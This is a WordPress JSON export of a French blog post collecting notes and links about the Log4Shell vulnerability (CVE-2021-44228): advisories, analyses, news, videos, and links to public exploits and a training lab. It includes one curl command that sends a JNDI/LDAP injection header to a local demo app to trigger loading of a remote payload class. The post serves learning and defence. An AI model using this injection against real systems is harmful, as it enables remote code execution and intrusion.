{"id":4878,"date":"2021-12-23T12:39:09","date_gmt":"2021-12-23T10:39:09","guid":{"rendered":"https:\/\/www.laurentmarot.fr\/wordpress\/?p=4878"},"modified":"2022-02-14T16:42:35","modified_gmt":"2022-02-14T14:42:35","slug":"quelques-notes-sur-log4j","status":"publish","type":"post","link":"https:\/\/www.laurentmarot.fr\/wordpress\/?p=4878","title":{"rendered":"Quelques notes sur Log4j"},"content":{"rendered":"<p>Juste pour comprendre, pour m\u00e9moire &#8230; et montrer \u00e0 quelques int\u00e9ress\u00e9s.<\/p>\n<div id=\"attachment_4903\" style=\"width: 247px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/log4shell.png\" rel=\"lightbox[4878]\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-4903\" class=\"size-medium wp-image-4903\" src=\"https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/log4shell-237x300.png\" alt=\"Source de l'image : https:\/\/xkcd.com\/2347\/\" width=\"237\" height=\"300\" srcset=\"https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/log4shell-237x300.png 237w, https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/log4shell.png 318w\" sizes=\"(max-width: 237px) 100vw, 237px\" \/><\/a><p id=\"caption-attachment-4903\" class=\"wp-caption-text\">Source: https:\/\/xkcd.com\/2347\/<\/p><\/div>\n<p><strong>Gal\u00e8res initiales :<\/strong><\/p>\n<pre class=\"lang-xml s-code-block\"><code class=\"hljs language-xml\">-J-Xbootclasspath\/a<\/code><\/pre>\n<p>=&gt; Salet\u00e9 de dysfonctionnment de Netbeans avec Java15<\/p>\n<p>et outillage :<\/p>\n<p>http:\/\/canarytokens.com\/tags\/traffic\/articles\/o7g2h2mrvsa52bpe08k5g6sud\/contact.php<\/p>\n<p><strong>Liste de ressources et conseils techs :<\/strong><\/p>\n<pre class=\"lang-java s-code-block\"><code class=\"hljs language-java\">-Dlog4j.configurationFile=\/path\/to\/your\/file\/log4j2.xml <\/code> =&gt; inutile !<\/pre>\n<p>un ptit coup de curl vers le \u00ab\u00a0faux\u00a0\u00bb serveur LDAP qui va \u00ab\u00a0juste\u00a0\u00bb rediriger vers le serveur h\u00e9bergeant la classe java \u00ab\u00a0Payload\u00a0\u00bb:<\/p>\n<pre>curl 127.0.0.1:8080\/Log4ShellDemo\/LoggingPage.jsp\r\n-H 'X-Api-Version: ${jndi:ldap:\/\/127.0.0.1:1389\/Exploit}'\r\n\r\n<\/pre>\n<p><a href=\"https:\/\/tryhackme.com\/room\/solar#\" target=\"_blank\" rel=\"noopener\">Try Hack Me Free interactive training lab<\/a> demonstrating the log4j vulnerability and mitigation methods and short <a href=\"https:\/\/www.youtube.com\/watch?v=OJRqyCHheRE\" target=\"_blank\" rel=\"noopener\">video<\/a>. Solar, exploiting log4j &#8211; Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun. Room created by John Hammond.<\/p>\n<p><a href=\"https:\/\/maxime-mn.github.io\/divers\/2021\/12\/13\/faille_log4j.html\" target=\"_blank\" rel=\"noopener\">Analyse de la faille Log4J par Maxime-Mn<\/a> (tr\u00e8s largement inspir\u00e9 de la Room de John Hammond ci-dessuss)<\/p>\n<p><a href=\"https:\/\/python.iitter.com\/other\/288569.html\" target=\"_blank\" rel=\"noopener\">Log4j2 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08cve-2021-44228\uff09\u590d\u73b0\uff08\u53cd\u5f39shell)<\/a> : un peu chinois mais vraiment le minimum n\u00e9cessaire et suffisant<\/p>\n<p><a href=\"https:\/\/github.com\/roxas-tan\/CVE-2021-44228\/blob\/main\/Exploit.java\" target=\"_blank\" rel=\"noopener\">Un exploit tout mignon qui lance Calc<\/a> par Roxas-Tan (COMIT du 16\/12\/2021)<\/p>\n<p><a href=\"https:\/\/atos.net\/en\/lp\/securitydive\/log4shell-unauthenticated-rce-0-day-exploit\" target=\"_blank\" rel=\"noopener\">Log4Shell &#8211; Unauthenticated RCE 0-day exploit (CVE-2021-44228)<\/a> par ATOS Threat Intelligence Team (20\/12\/2021). Il y a de la mati\u00e8re, mais c&rsquo;est illisible<\/p>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/50592\" target=\"_blank\" rel=\"noopener\">L&rsquo;exploit de base en Python<\/a> (Exploit DB -11\/12\/2021) par kozmer<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2021\/12\/17\/inside-the-code-how-the-log4shell-exploit-works\/\" target=\"_blank\" rel=\"noopener\">Inside the code: How the Log4Shell exploit works<\/a> <span class=\"byline\">by <span class=\"author vcard\"> <a class=\"author url fn\" title=\"Posts by Hardik Shah\" href=\"https:\/\/news.sophos.com\/en-us\/author\/hardik-shah\/\" rel=\"author\">Hardik Shah<\/a>, <\/span> <a class=\"author url fn\" title=\"Posts by Sean Gallagher\" href=\"https:\/\/news.sophos.com\/en-us\/author\/sean-gallagher\/\" rel=\"author\">Sean Gallagher<\/a> <a href=\"https:\/\/news.sophos.com\/en-us\/2021\/12\/17\/inside-the-code-how-the-log4shell-exploit-works\/\" rel=\"bookmark\">December 17, 2021<\/a> (Sophos Labs). Tr\u00e8s int\u00e9ressant pour la partie fonctionnement de Log4j.<\/span><\/p>\n<p><a href=\"https:\/\/almond.consulting\/information-security\/soc-cert-cwatch\/log4shell-le-cadeau-de-noel-empoisonne-en-cette-fin-dannee\/\" target=\"_blank\" rel=\"noopener\">Log4Shell : Le cadeau de No\u00ebl empoisonn\u00e9 en cette fin d\u2019ann\u00e9e<\/a> &#8211; Almond (15 d\u00e9cembre 2021). Bon rappel historique et contextuel<\/p>\n<p><a href=\"https:\/\/twitter.com\/cchaudoit\/status\/1475398738596315137\" target=\"_blank\" rel=\"noopener\">Le thread de Cyrilel Chaudoit sur Twitte<\/a>r (27\/12\/2021) : <span class=\"css-901oao css-16my406 r-poiln3 r-bcqeeo r-qvutc0\">Comprendre (simplement) la faille <\/span><span class=\"r-18u37iz\"><a class=\"css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1cvl2hr r-1loqt21 r-poiln3 r-bcqeeo r-qvutc0\" dir=\"ltr\" role=\"link\" href=\"https:\/\/twitter.com\/hashtag\/Log4shell?src=hashtag_click\">#Log4shell<\/a><\/span> <span class=\"r-18u37iz\"><a class=\"css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1cvl2hr r-1loqt21 r-poiln3 r-bcqeeo r-qvutc0\" dir=\"ltr\" role=\"link\" href=\"https:\/\/twitter.com\/hashtag\/Log4j?src=hashtag_click\">#Log4j<\/a><\/span><span class=\"css-901oao css-16my406 r-poiln3 r-bcqeeo r-qvutc0\"> et ses enjeux&#8230;<\/span><\/p>\n<p><a href=\"https:\/\/github.com\/cisagov\/log4j-affected-db\/blob\/develop\/SOFTWARE-LIST.md\" target=\"_blank\" rel=\"noopener\">Liste des produits affect\u00e9s<\/a> (mise \u00e0 jour du 29\/12\/2021 par Cybersecurity and Infrastructure Security Agency)<\/p>\n<p><a href=\"https:\/\/blogs.vmware.com\/security\/2021\/12\/investigating-cve-2021-44228-log4shell-vulnerability.html\" target=\"_blank\" rel=\"noopener\">Investigating CVE-2021-44228 Log4Shell Vulnerability<\/a> par Sanara Marsh et Chad Skipper (VMware Threat Research Team) Posted on December 12, 2021. Avec une partie tr\u00e8s int\u00e9ressante sur les m\u00e9canismes d&rsquo;exploitation et possibilit\u00e9s d&rsquo;infection par Mirai<\/p>\n<p>Tr\u00e8s bon papier du CERT XMCO sur log4j<\/p>\n<p>Mise \u00e0 jour du <a href=\"https:\/\/www.cert.ssi.gouv.fr\/alerte\/CERTFR-2021-ALE-022\/\" target=\"_blank\" rel=\"noopener\">Bulletin d&rsquo;alerte<\/a> du CERT-FR (7 janvier 2022)<\/p>\n<p>Log4j flaw attack levels remain high, Microsoft warns &#8211; <a href=\"https:\/\/www.zdnet.com\/article\/log4j-flaw-attacks-are-causing-lots-of-problems-microsoft-warn\" target=\"_blank\" rel=\"noopener\">ZDNET<\/a> 4 janvier 2022<\/p>\n<p>Log4j flaw hunt shows how complicated the software supply chain really is &#8211; <a href=\"https:\/\/www.zdnet.com\/article\/log4j-flaw-hunt-shows-how-complicated-the-software-supply-chain-really-is\" target=\"_blank\" rel=\"noopener\">ZDNET<\/a> 6 janvier 2022<\/p>\n<p>Ransomware: Hackers are using Log4j flaw as part of their attacks, warns Microsoft &#8211; <a href=\"https:\/\/www.zdnet.com\/article\/ransomware-warning-hackers-are-using-log4j-flaw-as-part-of-their-attacks-warns-microsoft\" target=\"_blank\" rel=\"noopener\">ZDNET<\/a> 11 janvier 2022<\/p>\n<p>Log4j: How hackers are using the flaw to deliver this new &lsquo;modular&rsquo; backdoor &#8211; <a href=\"https:\/\/www.zdnet.com\/article\/hackers-are-using-the-log4j-flaw-to-deliver-this-new-modular-backdoor\" target=\"_blank\" rel=\"noopener\">ZDNET<\/a> 12 janvier 2022<br \/>\n<span class=\"byline\"><br \/>\n<strong>Jolies images :<\/strong><\/span><\/p>\n<p><a href=\"https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639302564952.jpg\" rel=\"lightbox[4878]\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-4887\" src=\"https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639302564952-300x182.jpg\" alt=\"\" width=\"300\" height=\"182\" srcset=\"https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639302564952-300x182.jpg 300w, https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639302564952-1024x621.jpg 1024w, https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639302564952-768x466.jpg 768w, https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639302564952-1536x932.jpg 1536w, https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639302564952.jpg 2048w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639492644830.jpg\" rel=\"lightbox[4878]\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-4888\" src=\"https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639492644830-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" srcset=\"https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639492644830-300x300.jpg 300w, https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639492644830-1024x1024.jpg 1024w, https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639492644830-150x150.jpg 150w, https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639492644830-768x768.jpg 768w, https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639492644830.jpg 1200w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<div id=\"attachment_4916\" style=\"width: 310px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639382580588.jpg\" rel=\"lightbox[4878]\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-4916\" class=\"size-medium wp-image-4916\" src=\"https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639382580588-300x203.jpg\" alt=\"Cr\u00e9dits: govcert.ch\" width=\"300\" height=\"203\" srcset=\"https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639382580588-300x203.jpg 300w, https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639382580588-1024x692.jpg 1024w, https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639382580588-768x519.jpg 768w, https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/1639382580588.jpg 1204w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-4916\" class=\"wp-caption-text\">Cr\u00e9dits: govcert.ch<\/p><\/div>\n<div id=\"attachment_4910\" style=\"width: 310px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/LOG4j.png\" rel=\"lightbox[4878]\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-4910\" class=\"size-medium wp-image-4910\" src=\"https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/LOG4j-300x188.png\" alt=\"Apache Log4J Vulnerability - CVE-2021-44228 Flyer\" width=\"300\" height=\"188\" srcset=\"https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/LOG4j-300x188.png 300w, https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/LOG4j-1024x640.png 1024w, https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/LOG4j-768x480.png 768w, https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/LOG4j-1536x960.png 1536w, https:\/\/www.laurentmarot.fr\/wordpress\/wp-content\/uploads\/2021\/12\/LOG4j.png 2000w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-4910\" class=\"wp-caption-text\">Apache Log4J Vulnerability &#8211; CVE-2021-44228 <a href=\"https:\/\/securityzines.com\/flyers\/log4j.html\" target=\"_blank\" rel=\"noopener\">Flyer<\/a><\/p><\/div>\n<p><strong>Vid\u00e9os et Podcasts sympas :<\/strong><\/p>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=GK_m6wZp_sg&amp;nbsp;\" target=\"_blank\" rel=\"noopener\">CVE-2021-44228 Log4shell : Comment d\u00e9tecter et corriger cette vuln\u00e9rabilit\u00e9 sur log4j<\/a> &#8211; (Cyberwatch &#8211; 52 mn)<\/p>\n<p>Le bulletin hebdo de <a href=\"https:\/\/www.nolimitsecu.fr\/log4shell\/\" target=\"_blank\" rel=\"noopener\">No Limit Secu d\u00e9di\u00e9\u00a0 \u00e0 Log4Shell<\/a> (\u00e9pisode 346 du 13 d\u00e9cembre 2021)<\/p>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=e_2vSktWWQY\" target=\"_blank\" rel=\"noopener\">Panique g\u00e9n\u00e9rale ! Comment se prot\u00e9ger de Log4Shell ?<\/a> capsule vid\u00e9o du 16 d\u00e9cembre par Romain du Marais<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Quelques r\u00e9flexions sur le sujet :<\/strong><\/p>\n<p><a href=\"https:\/\/www.scmp.com\/tech\/big-tech\/article\/3160670\/apache-log4j-bug-chinas-industry-ministry-pulls-support-alibaba-cloud\" target=\"_blank\" rel=\"noopener\">Apache Log4j bug: China\u2019s industry ministry pulls support from Alibaba Cloud for not reporting flaw to government first<\/a> par <a class=\"article-author__name-link\" href=\"https:\/\/www.scmp.com\/author\/xinmei-shen\" data-v-84086802=\"\">Xinmei Shen<\/a> <time datetime=\"2021-12-22T07:34:10.000Z\" data-v-84086802=\"\"> Published: 3:34pm, 22 Dec, 2021 Updated: 3:45pm, 22 Dec, 2021<\/time><\/p>\n<p><a href=\"https:\/\/www.bortzmeyer.org\/log4shell.html\" target=\"_blank\" rel=\"noopener\">Log4Shell, et le financement du logiciel libre<\/a> par St\u00e9phane Bortzmeyer (Premi\u00e8re r\u00e9daction de l&rsquo;article le 14 d\u00e9cembre 2021)<\/p>\n<p><a href=\"https:\/\/www.securityweek.com\/microsoft-spots-multiple-nation-state-apts-exploiting-log4j-flaw\" target=\"_blank\" rel=\"noopener\">Microsoft Spots Multiple Nation-State APTs Exploiting Log4j Flaw<\/a> &#8211; Security Week By <a href=\"https:\/\/www.securityweek.com\/authors\/ryan-naraine\">Ryan Naraine<\/a> on December 15, 2021<\/p>\n<p>j&rsquo;en ai des plus croustillantes \u00e0 partager oralement<\/p>\n\n","protected":false},"excerpt":{"rendered":"<p>Juste pour comprendre, pour m\u00e9moire &#8230; et montrer \u00e0 quelques int\u00e9ress\u00e9s. Gal\u00e8res initiales : -J-Xbootclasspath\/a =&gt; Salet\u00e9 de dysfonctionnment de Netbeans avec Java15 et outillage : http:\/\/canarytokens.com\/tags\/traffic\/articles\/o7g2h2mrvsa52bpe08k5g6sud\/contact.php Liste de ressources et conseils techs : -Dlog4j.configurationFile=\/path\/to\/your\/file\/log4j2.xml =&gt; inutile ! un ptit coup de curl vers le \u00ab\u00a0faux\u00a0\u00bb serveur LDAP qui va \u00ab\u00a0juste\u00a0\u00bb rediriger vers le serveur [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20],"tags":[],"_links":{"self":[{"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/4878"}],"collection":[{"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4878"}],"version-history":[{"count":39,"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/4878\/revisions"}],"predecessor-version":[{"id":4940,"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/4878\/revisions\/4940"}],"wp:attachment":[{"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4878"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4878"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4878"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}